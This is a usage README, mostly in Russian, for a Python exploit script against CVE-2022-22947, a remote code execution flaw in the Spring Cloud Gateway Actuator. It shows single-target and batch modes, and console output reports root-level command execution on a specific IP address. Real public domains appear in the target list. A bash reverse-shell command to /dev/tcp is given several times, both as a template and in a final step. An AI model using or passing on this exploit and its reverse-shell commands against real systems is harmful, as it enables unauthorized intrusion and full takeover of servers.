
一个可单独、批量验证的脚本,也可以反弹shell
Уровень опасности: Высокий
Статус POC/EXP: Опубликован
Номер CNVD: CNNVD-2022-16402
Номер CVE: CVE-2022-22947
В Spring Cloud Gateway существует уязвимость удаленного выполнения кода. Эта уязвимость возникает в конечной точке Actuator приложения Spring Cloud Gateway, если она включена, открыта и не защищена, что делает систему подверженной инъекции кода. Злоумышленник может использовать эту уязвимость для создания вредоносного запроса, позволяющего выполнить произвольную команду на удаленном хосте.
-h Показать справку
-u Указать URL цели
-c Указать команду для выполнения (по умолчанию id)
-f Указать файл с URL-адресами целей
1. Проверка одной цели
Способ 1:
E:\pocs>python cve-2022-22947.py
Проверка одной цели:
1. python cve-2022-22947.py Войдите в интерактивный режим, затем введите URL цели и команду для выполнения в соответствии с подсказками. Убедитесь в правильности команды.
2. python cve-2022-22947.py -u http://example.com -c whoami
Проверка нескольких целей:
1. python cve-2022-22947.py -f url.txt , поместите все подлежащие проверке цели в директорию url
Обратная оболочка:
1. python cve-2022-22947.py -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
2. Войдите в интерактивный режим, введите цель и команду для обратной оболочки
Введите URL цели: http://123.58.236.76:8484
Введите команду для выполнения (по умолчанию id): whoami
[+]Цель: http://123.58.236.76:8484 , успешно получен вывод команды: ['root\\n']
Способ 2:
E:\learn\python\pocs\pocs>python cve-2022-22947.py -u http://123.58.236.76:8484 -c whoami
Проверка одной цели:
1. python cve-2022-22947.py Войдите в интерактивный режим, затем введите URL цели и команду для выполнения в соответствии с подсказками. Убедитесь в правильности команды.
2. python cve-2022-22947.py -u http://example.com -c whoami
Проверка нескольких целей:
1. python cve-2022-22947.py -f url.txt , поместите все подлежащие проверке цели в директорию url
Обратная оболочка:
1. python cve-2022-22947.py -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
2. Войдите в интерактивный режим, введите цель и команду для обратной оболочки
[+]Цель: http://123.58.236.76:8484 , успешно получен вывод команды: ['root\\n']
2. Массовая проверка
E:\learn\python\pocs\pocs>python cve-2022-22947.py -f url.txt
Проверка одной цели:
1. python cve-2022-22947.py Войдите в интерактивный режим, затем введите URL цели и команду для выполнения в соответствии с подсказками. Убедитесь в правильности команды.
2. python cve-2022-22947.py -u http://example.com -c whoami
Проверка нескольких целей:
1. python cve-2022-22947.py -f url.txt , поместите все подлежащие проверке цели в директорию url
Обратная оболочка:
1. python cve-2022-22947.py -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
2. Войдите в интерактивный режим, введите цель и команду для обратной оболочки
[+]Цель: http://123.58.236.76:8484 , успешно получен вывод команды: ['uid=0(root']
[+]Цель: http://123.58.236.76:8484 , успешно получен вывод команды: ['uid=0(root']
[+]Цель: http://123.58.236.76:8484 , успешно получен вывод команды: ['uid=0(root']
[-]Цель: http://www.baidu.com, проверка уязвимости не удалась, проверьте вручную!
[-]Цель: http://www.qq.com, проверка уязвимости не удалась, проверьте вручную!
[+]Цель: http://123.58.236.76:8484 , успешно получен вывод команды: ['uid=0(root']
3. Обратная оболочка
python cve-2022-22947.py -u http://123.58.236.76:8484 -c "bash -i >& /dev/tcp/xxx.xxx.xxx/65534 0>&1"
image-20220519233354807
image-20220519233429912